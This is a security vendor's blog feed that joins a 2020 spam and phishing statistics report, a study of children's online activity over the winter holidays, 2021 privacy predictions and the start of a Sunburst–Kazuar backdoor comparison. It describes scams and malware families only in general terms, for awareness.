Demand for online videoconferencing amid remote work led to a surge in fake online meeting invitations. A significant distinctive feature, which should have alarmed the recipients of the fake invitations, were the details that the page was asking them to enter in order to join the meeting. To access a real Zoom meeting, you need to know the meeting ID and password. The fake videoconference links opened fake Microsoft and WeTransfer pages, which contained fields for entering the login and password for a work account.

Messengers targeted

Scammers who were spreading their chain mail via social networks and instant messaging applications began to favor the latter. Message recipients, mostly in WhatsApp, were promised a discount or prize if they opened a link sent to them. The phishing web page contained a tempting message about a money prize, award or other, equally desirable, surprises.

The recipient had to fulfill two conditions: answer a few simple questions or fill out a questionnaire, and forward the message to a certain number of their contacts. Thus, the victim turned into a link in the spam chain, while subsequent messages were sent from a trusted address, thus avoiding anti-spam filters.

Besides that, a message from someone that the recipient knew would have much more credibility. Thus, the chain continued to grow, and the scammers went on enriching themselves. After all, even if the victim did fulfill the conditions, getting that promised prize proved not so simple, as the “lucky” recipient was urged to pay bank commission.

COVID-19 “Public relief” by spammers

Many governments did their best to help citizens during the pandemic. That initiative, together with the fact that people on the whole were willing to get payouts, became a theme for spam campaigns. Both individuals and companies were exposed to the risk of being affected by cybercriminals’ schemes.

Messages offering financial aid to businesses hurt by the pandemic or to underprivileged groups could crop up in social media feeds or arrive through instant messaging networks. The main requirement for getting the funds was filling out a detailed personal questionnaire. Those who took the step found that a small commission was required as well. Real government payouts these days are made through public portals that also serve other purposes and do not require additional registration, questionnaires or commissions.

Cybercriminals who offered tax deductions to companies employed a similar scheme. As in the examples above, the reason provided for the easing of tax policy was the pandemic, and in particular, anticipation of a second wave of COVID-19.

However, offers of tax deductions and compensations were hiding not just the danger of losing money but losing one’s account to the scammers, too, as many of the messages contained phishing links.

Malicious links

Email campaigns that promised compensation could also threaten computer security. Messages in Turkish, just as those mentioned earlier, offered a payout from Turkey’s Ministry of Health – not always mentioned by name – but getting the money required downloading and installing an APK file on the recipient’s smartphone. The attack was targeting Android users, and the downloadable application contained a copy of the Trojan-Dropper.AndroidOS.Hqwar.cf.

A fear of being infected with a new virus and a desire to know as much as possible about it could prompt recipients to review the email and open the links that it contained, as long as the message had been sent by a well-known organization. Fake letters from the WHO purporting to contain the latest safety advice were distributed in a variety of languages. The attachment contained files with various extensions. When the recipient tried to open these, malware was loaded onto the computer. In the message written in English, the attackers spread the Backdoor.Win32.Androm.tvmf, and in the one written in Italian, the Trojan-Downloader.MSOffice.Agent.gen.

Viral postal services

COVID-19 was also mentioned in fake email messages that mimicked notifications from delivery services. The sender said that there was a problem with delivering an order due to the pandemic, so the recipient needed to print out the attachment and take it to the nearest DHL office. The attached file contained a copy of the HEUR:Trojan.Java.Agent.gen.

The corporate sector

Spam that targeted companies also exploited the COVID-19 theme, but the cybercriminals occasionally relied on a different kind of tricks. For example, one of the emails stated that technical support had created a special alert system to minimize the risk of a new virus infection. All employees were required to log in to this system using their corporate account credentials and review their schedules and tasks. The link opened a phishing page disguised as the Outlook web interface.

In another instance, scammers were sending copies of the HEUR:Trojan-PSW.MSIL.Agensla.gen in the form of an email attachment. The scammers explained that the recipient needed to open the attached file, because the previous employee, who was supposed to send the “documentation”, had quit over COVID-19, and the papers had to be processed within three days.

“Nigerian” crooks making money from the pandemic

Email from “Nigerian” scammers and fake notifications of surprise lottery winnings regularly tapped the pandemic theme. The message in Korean shown below says that the recipient’s email address had been selected randomly by some center in Istanbul for a coronavirus-related emergency payout. Such surprise notices of winnings and compensations were generally sent out in a variety of languages. Messages from some lucky individuals who had won a huge sum and wished to support their fellow creatures in the difficult times of the pandemic were another variation on the “Nigerian” scam.

Where messages were signed as being from a lawyer trying to find a new owner for no-man’s capital, the sender emphasized that the late owner of the fortune had died of COVID-19.

An unusual turn of events

Regular “Nigerian” scam email is easy to recognize: it talks about millionaires or their relatives trying to inherit a huge fortune or bequeath it to someone who bears the same last name. The public seems to have become so accustomed to that type of junk mail that it has ceased to react, so cybercriminals have come up with a new cover story. To avoid being found out right away, they refrain from mentioning astronomical sums of money, instead posing as a mother from Russia who is asking for help with her daughter’s effort to collect postcards from around the world. The key point of this kind of messages is to get the potential victim to reply: the “mother’s” request sounds absolutely innocent and easy to do, so it can resonate with recipients. If the victim agrees to send a postcard, they are in for a lengthy email exchange with the scammers, who will offer them to partake in a large amount of money by paying a small upfront fee.

“Nigerian” scammers are not the only ones that have been getting creative. Spammers who sent out their messages through website feedback forms employed yet another unusual trick. The messages were signed as being from an outraged graphic artist or photographer, their names changing with each new message. The sender insisted that the website contained their works and thus violated their copyright, and demanded that the content be taken down immediately, threatening legal action.

The deadline for meeting the demand was quite tight, as the scammers needed the victim to open the link as soon as possible, while pondering on the consequences of that action as little as possible. A law-abiding site owner was likely to do just that. This is confirmed by related discussions in various blogs, with the users reporting that they immediately tried checking what photographs they had “stolen”. The links were not functional at the time the “complaints” were discovered, but in all likelihood, they had previously linked to malicious files or phishing programs.

Statistics: spam Proportion of spam in email traffic

The share of spam in global email traffic in 2020 was down by 6.14 p.p. when compared to the previous reporting period, averaging 50.37%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Proportion of spam in global email traffic, 2020 (download)

The percentage of junk mail gradually decreased over the year, with the highest figure (55.76%) recorded in January and the lowest (46.83%), in December. This may be due to the universal transition to remote work and a resulting increase in legitimate email traffic.

Sources of spam by country

The group of ten countries where the largest volumes of spam originated went through noticeable change in 2020. United States and China, which had shared first and second places (10.47% and 6.21%, respectively) in the previous three years, dropped to third and fourth. The “leader” was Russia, which was the source of 21.27% of all spam email in 2020. It was followed by Germany (10.97%), which was just 0.5 percentage points ahead of the United States.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Sources of spam by country in 2020 (download)

France gained 2.97 p.p. as compared to the year 2019, remaining fifth with 5.97%, while Brazil lost 1.76 p.p. and sunk to seventh place with 3.26%. The other countries in last year’s “top ten”, India, Vietnam, Turkey and Singapore, dropped out, giving way to the Netherlands (4.00%), which skipped to sixth place, Spain (2.66%), Japan (2.14%) and Poland (2.05%).

Malicious email attachments

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Attacks blocked by the email antivirus in 2020 (download)

In 2020, our solutions detected 184,435,643 dangerous email attachments. The peak in malicious activity, 18,846,878 email attacks blocked, fell on March, while December was the quietest month, with 11,971,944 malicious attachments, as it was in 2019.

Malware families

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malware families in 2020 (download)

Members of the Trojan.Win32.Agentb family were the most frequent (7.75%) malware spread by spammers. The family includes backdoors, capable of disrupting the functioning of a computer, and copying, modifying, locking or deleting data. The Trojan-PSW.MSIL.Agensla family was second with 7.70%. It includes malware that steals data stored by the browser, as well as credentials for FTP and email accounts.

Equation Editor vulnerability exploits, Exploit.MSOffice.CVE-2017-11882, dropped to third place with 6.55 percent. This family had topped the ranking of malware spread through spam in the previous two years.

Trojan.MSOffice.SAgent malicious documents dropped from second to fourth place with 3.41%. These contain a VBA script, which runs PowerShell to download other malware secretly.

In fifth place, with 2.66%, were Backdoor.Win32.Androm modular backdoors, which, too, are frequently utilized for delivering other malware to an infected system. These were followed by the Trojan.Win32.Badun family, with 2.34%. The Worm.Win32.WBVB worms, with 2.16%, were seventh. Two families, in eighth and ninth place, contain malware that carefully evades detection and analysis: Trojan.Win32.Kryptik  trojans, with 2.02%, use obfuscation, anti-emulation and anti-debugging techniques, while Trojan.MSIL.Crypt trojans, with 1.91%, are heavily obfuscated or encrypted. The Trojan.Win32.ISO family, with 1.53%, rounds out the rankings.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

TOP 10 malicious email attachments in 2020 (download)

The rankings of malicious attachments largely resemble those of malware families, but there are several subtle differences. Thus, our solutions detected the exploit that targeted the CVE-2017-11882 vulnerability more frequently (6.53%) than the most common member of the Agensla family (6.47%). The WBVB worm, with 1.93%, and the Kryptik trojan, with 1.97%, switched positions, too. Androm-family backdoors missed the “top ten” entirely, but the Trojan-Spy.MSIL.Noon.gen, with 1.36%, which was not represented in the families rankings, was tenth.

Countries targeted by malicious mailshots

Spain was the main target for malicious email campaigns in 2020, its share increasing by 5.03 p.p. to reach 8.48%. As a result of this, Germany, which had topped the rankings since 2015, dropped to second place with 7.28% and Russia, with 6.29%, to third.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Countries targeted by malicious mailshots in 2020 (download)

Italy’s share (5.45%) fell slightly, but that country remained in fourth place. Vietnam, which had previously rounded out the top three, dropped to fifth place with 5.20%, and the United Arab Emirates, with 4.46%, to sixth. Mexico, with 3.34%, rose from ninth to seventh place, followed by Brazil, with 3.33%. Turkey, with 2.91%, and Malaysia, with 2.46%, rounded out the rankings, while India, 2.34%, landed in eleventh place last year.

Statistics: phishing

In 2020, Anti-Phishing was able to block 434,898,635 attempts at redirecting users to phishing web pages. That is 32,289,484 fewer attempts than in 2019. A total of 13.21% of Kaspersky users were attacked worldwide, with 6,700,797 masks describing new phishing websites added to the system database.

Attack geography

In 2020, Brazil regained its leadership by number of Anti-Phishing detections, with 19.94% of users trying to open phishing links at least once.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Geography of phishing attacks in 2020 (download)

TOP 10 countries by number of attacked users

The countries with the largest numbers of attempts at opening phishing websites in 2018 “topped the rankings” again in 2020: Brazil, with 19.94%, in first place, and Portugal, with 19.73%, in second place. Both countries’ indicators dropped remarkably from 2019, Brazil “losing” 10.32 p.p. and Portugal, 5.9 p.p. France, which had not been seen among the ten “leaders” since 2015, was in third place with 17.90%.

Venezuela, last year’s “leader”, had the largest numbers in the first two quarters of 2020, but came out eighth overall, the share of attacked users in that country decreasing by 14.32 p.p. to 16.84%.

Country Share of attacked users (%)* Brazil 19.94 Portugal 19.73 France 17.90 Tunisia 17.62 French Guiana 17.60 Qatar 17.35 Cameroon 17.32 Venezuela 16.84 Nepal 16.72 Australia 16.59

* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2020

Top-level domains

Most scam websites, 24.36% of the total number, had a .com domain name extension last year. Websites with a .ru extension were 22.24 p.p. behind with 2.12%. All other top-level domains in the “top ten” are various country-code TLDs: the Brazilian .com.br with 1.31% in third place, with Germany’s .de, (1.23%), and Great Britain’s .co.uk (1.20%) in fourth and fifth places, respectively. In sixth place was the Indian domain extension .in, with 1.10%, followed by France’s .fr with 1.08%, and Italy’s .it with 1.06%. Rounding out the rankings were the Dutch .nl, with 1.03%, and the Australian .com.au, with 1.02%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Most frequent top-level domains for phishing pages in 2020 (download)

Organizations under attack

The rating of attacks by phishers on different organizations is based on detections by Kaspersky Lab’s Anti-Phishing deterministic component. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database.

Last year’s events affected the distribution of phishing attacks across the categories of targeted organizations. The three largest categories had remained unchanged for several years: banks, payment systems and global Internet portals. The year 2020 brought change. Online stores became the largest category with 18.12%, which may be linked to a growth in online orders due to pandemic-related restrictions. Global Internet portals remained the second-largest category at 15.94%, but their share dropped by 5.18 p.p. as compared to 2019, and banks were third with a “modest” 10.72%.

Online games and government and taxes dropped out of the “top ten” in 2020. They were replaced by delivery companies and financial services.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of organizations targeted by phishers, by category in 2020 (download)

Conclusion

With its pandemic and mass transition to remote work and online communication, last year was an unusual one, which was reflected in spam statistics. Attackers exploited the COVID-19 theme, invited victims to non-existent video conferences and insisted that their targets register with “new corporate services”. Given that the fight against the pandemic is not over yet, we can assume that the main trends of 2020 will stay relevant into the near future.

The general growing trend of targeted attacks on the corporate sector will continue into next year, all the more so because the remote work mode, increasingly popular, makes employees more vulnerable. Users of instant messaging networks should raise their guard, as the amount of spam and phishing messages received by their mobile devices is likely to grow as well. Besides, the number of email messages and schemes exploiting the COVID-19 theme one way or another has a high likelihood of rising.

2021. február 4.

How kids coped with COVID-hit winter holidays

Due to the pandemic situation in late 2020, street festivities got canceled worldwide. For many families, get-togethers with grandparents over the Christmas period were also put on hold. As a result, children across the globe sought holiday fun and games from the comfort of home. And thanks to modern tech and the ubiquitous internet, they had no reason to be bored.

We analyzed and categorized the most popular websites and search queries over the festive period (December 20, 2020 — January 10, 2021) to find out how kids compensated for the lack of outdoor winter entertainment.

How we collect our statistics

Our Kaspersky Safe Kids solution for home users scans the contents of web pages that children try to visit. If the site falls into one of fourteen undesirable categories, the product sends an alert to Kaspersky Security Network. In doing so, no personal data is transmitted and user privacy is not violated. Note:

  • It is up to the parent to decide which content to block by tweaking the protective solution’s preferences. However, anonymous statistics are collected for all the 14 categories.
  • The information in this report was obtained from computers running Windows and macOS; mobile statistics are not presented.
Website categorization

Web filtering in Kaspersky Safe Kids currently covers the following categories:

  • Online communication (social networks, messengers, chats, forums)
  • Adult content
  • Alcohol, tobacco, narcotics
  • Violence
  • Weapons, explosives, pyrotechnics
  • Profanity
  • Gambling, lotteries, sweepstakes
  • Video games
  • Electronic commerce (shops, banks, payment systems)
  • Software, audio, video
  • Recruitment
  • Religions, religious associations
  • News media
  • Anonymous access tools
Search query filtering

Children’s search activities best illustrate their interests. Kaspersky Safe Kids can filter kids’ queries in five search engines (Bing, Google, Mail.ru, Yahoo!, Yandex), as well as on YouTube. Filtering targets six potentially dangerous topics: Adult content, Alcohol, Narcotics, Tobacco, Racism and Profanity.

We took as the 100% value the Top 1000 search queries collected from the above search engines, plus YouTube, and separately calculated the Top 1000 search queries for this video platform. The ranking was based on the number of times a query was input, without breakdown by region or language. The popularity of a topic is determined by its share of related queries.

We divided the search queries collected from December 20, 2020 to January 10, 2021 into thematic categories:

  • YouTube
  • Games
  • Translate
  • Communication
  • Music
  • Video platforms
  • Education
  • Shopping
  • Anime
  • Cartoons
  • Other topics

Because YouTube queries account for nearly 50% of the total, they merit a separate category.

What sites were kids interested in?

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of categories of visited sites, December 20, 2020 — January 10, 2021 (download)

Most often, children visited websites with video and audio content (40.36%). This is 2.58 p.p. more than the average for the year (June 2019 — May 2020), while the share of the category amounted to 39.11%. In second place was Online communication (25.8%). The share of visits to the web versions of WhatsApp and Telegram, Facebook, Instagram and other sites in this category also increased against the average indicator for the year (24.16%). Third place went to Video games (16.19%), interest in which also grew slightly: data for the period June 2019 — May 2020 showed 15.98%. But the number of visits to online stores turned out lower than the yearly average: 10.94% versus 11.25% in 2019–2020.

What did kids look for during the winter break?

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of Top 1000 search queries by topic, December 20, 2020 — January 10, 2021 (download)

Kids’ search activity shines a light on their interests and largely correlates with the stats on website hits. The highest number of searches in the Top 1000 during the winter break mentioned YouTube (20.84%). In second place in terms of popularity were gaming-related queries (15.47%). Kids also often searched for online translation resources (11.02%). The most popular English-language query on this topic was “google translate”.

Software, audio, video

Despite many overlapping interests, kids from one region sometimes showed a greater preference for certain content than their peers elsewhere. In particular, children from South Asia (Bangladesh, India) showed the most interest in audio and video content (52.84%). In the CIS, meanwhile, the share of such content was only 39.2%.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of visits to websites in the Software, audio, video category by region, December 20, 2020 — January 10, 2021 (download)

YouTube is currently one of the most popular sites; it was there that children spent most of their time during the festive holidays. This is backed up by the data on kids’ search queries: 46% of all Top 1000 queries in the reporting period happened on YouTube; and the most popular search engine query worldwide was “youtube”.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of Top 1000 search queries by source, December 20, 2020 — January 10, 2021 (download)

We decided to see what exactly kids look for inside YouTube itself. To do so, we collected the Top 1000 search queries by children on this platform from December 20, 2020 to January 10, 2021.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Distribution of Top 1000 kids’ search queries on YouTube by topic, December 20, 2020 — January 10, 2021 (download)

Most often, children searched for gaming content (37%). In second place are searches for bloggers or channels of a general nature (20.94%). The typical blogger followed by kids usually posts videos related to one or more of the following: challenges, unboxing, DIY, lifestyle, streams of popular games; plus a mandatory music clip. Such bloggers accounted for no less than a fifth of the search queries in our Top 1000.

The third most common YouTube search topic, as expected, is music (17.13%), the most sought-after artists being the Korean pop groups BLACKPINK and BTS, alongside Ariana Grande, Billie Eilish and Travis Scott. The most popular songs were “Baby Shark”, “Dance Monkey” and “Savage Love” (a dance on TikTok with 24 million views).

But YouTube wasn’t the only platform of interest to children. In the Video platforms category (7.59%), children searched for “netflix”, “disney plus”, “amazon prime” and (Russian-speaking kids) “yandex ether”.

The most popular TV series over the festive period, judging by the number of queries, was The Mandalorian.

Video games

The Video games category ranks third by number of website visits by children worldwide. The most likely to visit gaming sites were kids in Asia (25.10%). But those in South Asia, as we saw above, prefer video and audio content (5.21%) over games.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Share of visits to websites in the Video games category by region, December 20, 2020 — January 10, 2021 (download)

Among the search queries, gaming is the second most popular topic after queries related to YouTube. The three most popular queries in the reporting period were “roblox”, “among us” and “minecraft”.

Moreover, most kids’ searches on YouTube were for channels of streamers who play live games and bloggers who specialize in Minecraft.

!function(e,i,n,s){var t="InfogramEmbeds",d=e.getElementsByTagName("script")[0];if(window[t]&&window[t].initialized)window[t].process&&window[t].process();else if(!e.getElementById(n)){var o=e.createElement("script");o.async=1,o.id=n,o.src="https://e.infogram.com/js/dist/embed-loader-min.js",d.parentNode.insertBefore(o,d)}}(document,0,"infogram-async");

Shares of grouped search queries in the Top 1000 queries on the topic of video games on YouTube, December 20, 2020 — January 10, 2021 (download)

The most popular gaming blogger among English speakers for many years now has been PewDiePie, and among Russian speakers Pozzi. The most popular kids’ games, judging by YouTube search activity, are Among Us, Minecraft, Brawl Stars and Gacha Life. The last of these let’s players create video stories to watch on YouTube, which kids simply love.

As we predicted in the runup to the festive period, kids couldn’t get enough of the Nintendo Switch game console. During the winter break, kids searched for “nintendo switch” and “nintendo switch lite” more often than “ps5”. One of the biggest-hit Nintendo Switch games was Just Dance.

Interests worth a special mention

In some regions winter break starts earlier or later than in others, that is why education (5.34%) was still a popular search topic. English-speaking children, for example, most often searched for “google classroom”.

During the holidays, children took an interest in DIY instruction videos. The most popular YouTube channels on this topic are 5-Minute Crafts (70 million+ subscribers), Troom Troom (21.7 million) and 123 GO! (around 10 million). Accordingly, the most popular DIY-themed searches among kids were “5 minute crafts”, “troom troom” and “123 go”.

5-Minute Crafts channel on YouTube

Besides musicians and bloggers, the personalities that children inquired about most during the winter break were Donald Trump (searched for more than any other famous figure), Emma Watson and Elon Musk.

Despite ASMR videos having been around forever (almost), we observed that kids have become more interested in them lately. Among the frequent searches were “asmr” and “asmr eating”.

This winter was not without challenges (in every sense of the word). As for the online variety, Try Not To Laugh was the most popular during the holiday period. Children searched for it not only in English, but also, for example, in German “versuche nicht zu lachen”.

If you think kids had no time for TikTok, think again. In addition to the general queries “tiktok” and “tik tok”, they searched for “tik tok mashup”, “how to change restricted mode on tiktok”.

Conclusion

Despite the absence of Christmas fairs and New Year parties, children still found plenty of entertainment, and not only of the consumerist kind. Going by the popularity of DIY videos, kids enjoy tinkering and making things manually, while their passion for Gatcha Life reveals a desire to tell and screen their own stories. TikTok inspires them to get off the couch and shoot all kinds of videos, not just silly ones. K-pop makes it impossible to sit still, and kids love learning dance moves from music clips and special dance videos. Contrary to the stereotype, video games can also help stay physically active: for example, on the Nintendo Switch, the smash-hit Just Dance, which teaches dance moves, and the fitness games Ring Fit Adventure and Fitness Boxing 2: Rhythm & Exercise, released in early December 2020.

Modern technologies are deeply integrated into all our lives, and especially for children who have no recollection of a world without video games, YouTube and messengers at their beck and call. And that’s no bad thing, because today’s kids know how to diversify their leisure time without leaving home. We adults would do well to take a leaf from their virtual book.

2021. január 28.

Privacy predictions for 2021

2020 saw an unprecedented increase in the importance and value of digital services and infrastructure. From the rise of remote working and the global shift in consumer habits to huge profits booked by internet entertainers, we are witnessing how overwhelmingly important the connected infrastructure has become for the daily functioning of society.

What does all this mean for privacy? With privacy more often than not being traded for convenience, we believe that for many 2020 has fundamentally changed how much privacy people are willing to sacrifice in exchange for security (especially from the COVID-19 threat) and access to digital services. How are governments and enterprises going to react to this in 2021? Here are some of our thoughts on what the coming year may look like from the privacy perspective, and which diverse and sometimes contrary forces are going to shape it.

  1. Smart health device vendors are going to collect increasingly diverse data – and use it in increasingly diverse ways.

    Heart rate monitors and step counters are already a standard in even the cheapest smart fitness band models. More wearables, however, now come with an oximeter and even an ECG, allowing you to detect possible heart rate issues before they can even cause you any trouble. We think more sensors are on the way, with body temperature among the most likely candidates. And with your body temperature being an actual public health concern nowadays, how long before health officials want to tap into this pool of data? Remember, heart rate and activity tracker data – as well as consumer gene sequencing – has already been used as evidence in a court of law. Add in more smart health devices, such as smart body scales, glucose level monitors, blood pressure monitors and even toothbrushes and you have huge amounts of data that is invaluable for marketers and insurers.

  2. Consumer privacy is going to be a value proposition, and in most cases cost money.
    Public awareness of the perils of unfettered data collection is growing, and the free market is taking notice. Apple has publicly clashed with Facebook claiming it has to protect its users’ privacy, while the latter is wrestling with regulators to implement end-to-end encryption in its messaging apps. People are more and more willing to choose services that have at least a promise of privacy, and even pay for them. Security vendors are promoting privacy awareness, backing it with privacy-oriented products; incumbent privacy-oriented services like DuckDuckGo show they can have a sustainable business model while leaving you in control of your data; and startups like You.com claim you can have a Google-like experience without the Google-like tracking.
  3. Governments are going to be increasingly jealous of big-tech data hoarding – and increasingly active in regulation.
    The data that the big tech companies have on people is a gold mine for governments, democratic and oppressive alike. It can be used in a variety of ways, from using geodata to build more efficient transportation to sifting through cloud photos to fight child abuse and peeking into private conversations to silence dissent. However, private companies are not really keen on sharing it. We have already seen governments around the world oppose companies’ plans to end-to-end encrypt messaging and cloud backups, pass legislation forcing developers to plant backdoors into their software, or voice concerns with DNS-over-HTTPS, as well as more laws regulating cryptocurrency being enacted everywhere, and so on and so forth. But big tech is called big for a reason, and it will be interesting to see how this confrontation develops.
  4. Data companies are going to find ever more creative, and sometimes more intrusive, sources of data to fuel the behavioral analytics machine.
    Some sources of behavioral analytics data are so common we can call them conventional, such as using your recent purchases to recommend new goods or using your income and spending data to calculate credit default risk. But what about using data from your web camera to track your engagement in work meetings and decide on your yearly bonus? Using online tests that you take on social media to determine what kind of ad will make you buy a coffee brewer? The mood of your music playlist to choose the goods to market to you? How often you charge your phone to determine your credit score? We have already seen these scenarios in the wild, but we are expecting the marketers to get even more creative with what some data experts call AI snake oil. The main implication of this is the chilling effect of people having to weigh every move before acting. Imagine knowing that choosing your Cyberpunk 2077 hero’s gender, romance line and play style (stealth or open assault) will somehow influence some unknown factor in your real life down the line. And would it change how you play the game?
  5. Multi-party computations, differential privacy and federated learning are going to become more widely adopted – as well as edge computing.
    It is not all bad news. As companies become more conscious as to what data they actually need and consumers push back against unchecked data collection, more advanced privacy tools are emerging and becoming more widely adopted. From the hardware perspective, we will see more powerful smartphones and more specialized data processing hardware, like Google Coral, Nvidia Jetson, Intel NCS enter the market at affordable prices. This will allow developers to create tools that are capable of doing fancy data processing, such as running neural networks, on-device instead of the cloud, dramatically limiting the amount of data that is transferred from you to the company. From the software standpoint, more companies like Apple, Google and Microsoft are adopting differential privacy techniques to give people strict (in the mathematical sense) privacy guarantees while continuing to make use of data. Federated learning is going to become the go-to method for dealing with data deemed too private for users to share and for companies to store. With more educational and non-commercial initiatives, such as OpenMined, surrounding them, these methods might lead to groundbreaking collaborations and new results in privacy-heavy areas such as healthcare.

We have seen over the last decade, and the last few years in particular, how privacy has become a hot-button issue at the intersection of governmental, corporate and personal interests, and how it has given rise to such different and sometimes even conflicting trends. In more general terms, we hope this year helps us, as a society, to move closer to a balance where the use of data by governments and companies is based on privacy guarantees and respect of individual rights.

2021. január 11.

Sunburst backdoor – code overlaps with Kazuar

Introduction

On December 13, 2020, FireEye published a blog post detailing a supply chain attack leveraging Orion IT, an infrastructure monitoring and management platform by SolarWinds. In parallel, Volexity published an article with their analysis of related attacks, attributed to an actor named “Dark Halo”. FireEye did not link this activity to any known actor; instead, they gave it an unknown, temporary moniker – “UNC2452”.

This attack is remarkable from many points of view, including its stealthiness, precision targeting and the custom malware leveraged by the attackers, named “Sunburst” by FireEye.

In a previous blog, we dissected the method used by Sunburst to communicate with its C2 server and the protocol by which victims are upgraded for further exploitation. Similarly, many other security companies published their own analysis of the Sunburst backdoor, various operational details and how to defend against this attack. Yet, besides some media articles, no solid technical papers have been published that could potentially link it to previously known activity.

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Kazuar is a .NET backdoor first reported by Palo Alto in 2017. Palo Alto tentatively linked Kazuar to the Turla APT group, although no solid attribution link has been made public. Our own observations indeed confirm that Kazuar was used together with other Turla tools during multiple breaches in past years.

A number of unusual, shared features between Sunburst and Kazuar include the victim UID generation algorithm, the sleeping algorithm and the extensive usage of the FNV-1a hash.

We describe these similarities in detail below.

For a summary of this analysis and FAQs, feel free to scroll down to “Conclusions“.

We believe it’s important that other researchers around the world investigate these similarities and attempt to discover more facts about Kazuar and the origin of Sunburst, the malware used in the SolarWinds breach. If we consider past experience, looking back to the WannaCry attack, in the early days, there were very few facts linking them to the Lazarus group. In time, more evidence appeared and allowed us, and others, to link them together with high confidence. Further research on this topic can be crucial in connecting the dots.

More information about UNC2452, DarkHalo, Sunburst and Kazuar is available to customers of the Kaspersky Intelligence Reporting service. Contact: intelreports[at]kaspersky.com

Technical Details Background

While looking at the Sunburst backdoor, we discovered several features that overlap with a previously identified backdoor known as Kazuar. Kazuar is a .NET backdoor first reported by Palo Alto in 2017.
